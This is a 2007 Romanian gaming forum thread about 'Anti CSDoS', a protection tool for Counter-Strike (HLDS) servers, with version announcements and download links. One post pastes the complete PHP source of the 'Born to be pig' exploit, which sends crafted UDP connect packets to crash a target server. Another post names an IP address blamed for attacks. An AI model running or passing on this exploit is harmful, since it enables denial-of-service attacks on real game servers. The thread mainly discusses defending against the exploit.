Anti CSDoS by Shocker [Windows] - Cea mai buna metoda

ScaRba · Posted: 11-07-2007, 12:56:44 | Translate post to: ... (Click for more languages)

Da o mica solutie pentru ala ar fi sa porniti srv in consola odata dupa care sa dezactivati oprirea automata a monitorului in caz ca srv este dat pe real time . dupa care atunci cand ve-ti fi atacat va ramane in consola Born to be pig luati ip ala il banati numai sa nu aveti norocul sa fie RDS asta ar insemna sa banati ceva in genu xxx.xxx.0.0 si nu doar o clasa e naspa oricum sper sa nu se mai discute de exploitul acela pentru a nu deveni si mai popular !

RTYUI · Posted: 11-08-2007, 10:11:44 | Translate post to: ... (Click for more languages)

pentru linux exista ceva? am bagat HLSheld..si tot il pica unu ...
programul l-am luat dintr-un topic facut de hidden... la HLDS

i'm BACK !

Empire · Posted: 11-08-2007, 15:41:03 | Translate post to: ... (Click for more languages)

mdea..sincer programul a fost bine intentionat facut dar sa va zic cum sta treaba : am srv adminmod pe win iar cei care folosesc csdos q un fell de arma cand dau flood nu pica nimic din comp...doar k programul arata ip care a dat si se blokeaza srv..asta e singura diferenta

Surfer · Posted: 13-08-2007, 14:15:07 | Translate post to: ... (Click for more languages)

Eu l-am probat pe un server p linux si nu l-a picat ...nush cum ti-l pica tie dak ai serv pe linux si ai si Hlshield....

Shocker · Posted: 27-08-2007, 18:26:36 | Translate post to: ... (Click for more languages)

Ok, la rugamintea userului clep am scos si versiunea 1.5 care permite patch-uirea mai multor servere de pe acelasi computer

Aveti o lista cu toate procesele de HLDS care ruleaza, cu hostname-ul fiecarui server [este citit din \cstrike\server.cfg al procesului respectiv]. Bifati serverul pe care vreti sa il (un)patch-uiti

Acelasi link de download:

Code:

http://www.ShockingSoft.com/download.php?tip=soft&file=AntiCSDoS.zip

Screenshot:

FREAKZ COMMUNITY @ Facebook
WOW FREAKZ @ Facebook

aTenTie · Posted: 31-08-2007, 10:25:45 | Translate post to: ... (Click for more languages)

In actuala varianta 1.5 ai pus si treaba cu primitul unui mesaj de catre cel care incearca se dea jos serverul ?

Actuala varianta are protectie si pentru alte softuri de atac sau doar CSDOS ?

Am instalat actuala varianta 1.5 si merge foarte bine, am scapat de problemele cu ip 0.0.0.0 .

Best4You

Shocker · Posted: 31-08-2007, 15:52:20 | Translate post to: ... (Click for more languages)

Momentan e doar anti-CSDoS, o sa ma documentez, cand am timp, si despre celelalte tipuri de atacuri si o sa implementez. Daca gasiti voi documentatie despre ele, sa ma scutiti pe mine de cautat, m-ati ajuta sa il fac cat mai repede

FREAKZ COMMUNITY @ Facebook
WOW FREAKZ @ Facebook

Surfer · Posted: 10-09-2007, 01:58:33 | Translate post to: ... (Click for more languages)

Uite aici codul din exploitul respectiv :

CS-dos exploit made by gemaglabin
Bug was discovered by .FUF # 111596
Big respect 2 Sax-mmS ( for html ) , Focs ( for his cs server biggrin.gif ) , SkvoznoY , Bug(O)R,Antichat.ru and Cup.su
underwater.cup.su
*/

ini_set("display_errors","0");

function HELLO_PACKET()
{
$packet = pack("H*","FFFFFFFF");
$packet .= "TSource Engine Query";
$packet .= pack("H*","00");
return $packet;
}

function CHALLENGE_PACKET()
{
$packet = pack("H*","FFFFFFFF");
$packet .= "getchallenge valve";
$packet .= pack("H*","00");
return $packet;
}

function LOGIN_PACKET_4()
{
global $cookie;
global $password;
$packet = pack("H*","FFFFFFFF");
$packet .= "connect 47 ";
$packet .= $cookie.' "';
$packet .= '\prot\4\unique\-1\raw\valve\cdkey\d506d189cf551620a70277a3d2c55bb2" "';
$packet .= '\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\mod';
$packet .= 'el\gordon\name\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
$packet .= 'word\\'.$password;
$packet .= pack("H*","220A0000EE02");
return $packet;
}

function LOGIN_PACKET_2()
{
global $cookie;
global $password;
$packet = pack("H*","FFFFFFFF");
$packet .= "connect 47 ";
$packet .= $cookie.' "';
$packet .= '\prot\2\raw\d506d189cf551620a70277a3d2c55bb2" "\_cl_autowepswitch\1\bott';
$packet .= 'omcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\model\gordon\nam';
$packet .= 'e\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
$packet .= 'word\\'.$password;
$packet .= pack("H*","22");
return $packet;
}

function dowork($host,$port,$password,$auth)
{
global $password;
global $cookie;
# connecting to target host
$fsock = fsockopen("udp://".$host,(int) $port,$errnum,$errstr,2);
if (!$fsock) die ($errstr);
else
{
# sending hello packet
fwrite ($fsock,HELLO_PACKET());
fread ($fsock,100);
# sending chalennge packet
fwrite ($fsock,CHALLENGE_PACKET());
# recieving cookies
$resp = fread($fsock,100);
# grab cookies from packet
$cookie = substr($resp,strpos($resp,"A00000000")+10);
$cookie = substr($cookie,0,strpos($cookie," "));
# sending login packet
if (!$auth) fwrite ( $fsock,LOGIN_PACKET_4());else fwrite ( $fsock,LOGIN_PACKET_2());
$resp = fread($fsock,100);
}
}

IF (isset($_POST['host']) && isset($_POST['port']))
{
IF (empty($_POST['pass'])) $password = "123";
else $password = $_POST['pass'];
$fserver = $_POST['host'];
$fport = $_POST['port'];
if (isset($_POST['auth'])) $fauth = true;else $fauth=false;
# we have to connect 2 times
$result = dowork($fserver,$fport,$password,$fauth);
$result = dowork($fserver,$fport,$password,$fauth);
# parsing result
echo "Exploit Sent";
}
?>

<R.I.P>MorTy<cL& · Posted: 11-09-2007, 15:50:19 | Translate post to: ... (Click for more languages)

imi spune si mie cineva de unde iau anti-csdosu???k ma sacaie unu la cap cu floodurile lui

am luat dllul acela dar nu stiu de unde sa iau anti-csdosul???

:hammers:

:weapons:

:hang:

yo!!!nush ce sa scriu:(

S1dur · Posted: 11-09-2007, 16:02:19 | Translate post to: ... (Click for more languages)

http://www.shockingsoft.com

Shocker · Posted: 11-09-2007, 20:20:11 | Translate post to: ... (Click for more languages)

Surfer, multumesc pentru ala, dar din pacate nu am timp zilele astea, lucrez la site la freakz.ro, asta e prioritatea.

<R.I.P>MorTy<cL& wrote:

imi spune si mie cineva de unde iau anti-csdosu???k ma sacaie unu la cap cu floodurile lui

am luat dllul acela dar nu stiu de unde sa iau anti-csdosul???

Vezi primul post din topicul asta

FREAKZ COMMUNITY @ Facebook
WOW FREAKZ @ Facebook

Surfer · Posted: 11-09-2007, 21:14:15 | Translate post to: ... (Click for more languages)

K...nu e nici o graba , cand ai timp sper sa te ocupi si de exploitul acesta

loren28 · Posted: 24-10-2007, 16:19:42 | Translate post to: ... (Click for more languages)

da a mai aparut un nenorocit de exploit.nu stiu cum arata dar a trecut de anticsdos v1.5.desi a receptionat ca este atacat si mi-a aratat ipul tot a trecut.Iata si ipul nenorocitului care mi la atacat.
86.104.146.123

linuxatu · Posted: 02-11-2007, 21:10:06 | Translate post to: ... (Click for more languages)

loren28 stai linistit ca si pe mine ma ataca ip-ul ala ... se
pare ca v1.5 need's to be upgraded ... banuisesc ca exploitul gasit de surfer e ce-l care inca darama servere,
apropo e vorba de "Born to be pig". Se pare ca niste copii de 12 ani au invatat sa foloseasca google-u.

Shocker · Posted: 11-11-2007, 00:57:21 | Translate post to: ... (Click for more languages)

Ok, am vazut ca a mai postat cineva ca e atacat prin "Born to be pig", am vazut ca se inmultesc atacurile, asa ca mi-am facut putin timp [da stiu, e 1 noaptea, e cea mai potrivita ora pentru programare

] si am scos versiunea 2.0, cu 2 chestii in plus:
1. Protectie impotriva exploit-ului "Born to be pig"
2. Posibilitatea de a trimite un mesaj personalizat atacatorului [ATENTIE: AntiCSDoS trebuie sa ruleze pentru ca mesajul personalizat sa fie afisat atacatorului, daca nu ruleaza va fi afisata doar partea cu "Protected by AntiCSDoS by Shocker - http://www.ShockingSoft.com"]

Demonstratie cu mesajul personalizat:

Acelasi link de download:

Code:

http://www.ShockingSoft.com/download.php?tip=soft&file=AntiCSDoS.zip

FREAKZ COMMUNITY @ Facebook
WOW FREAKZ @ Facebook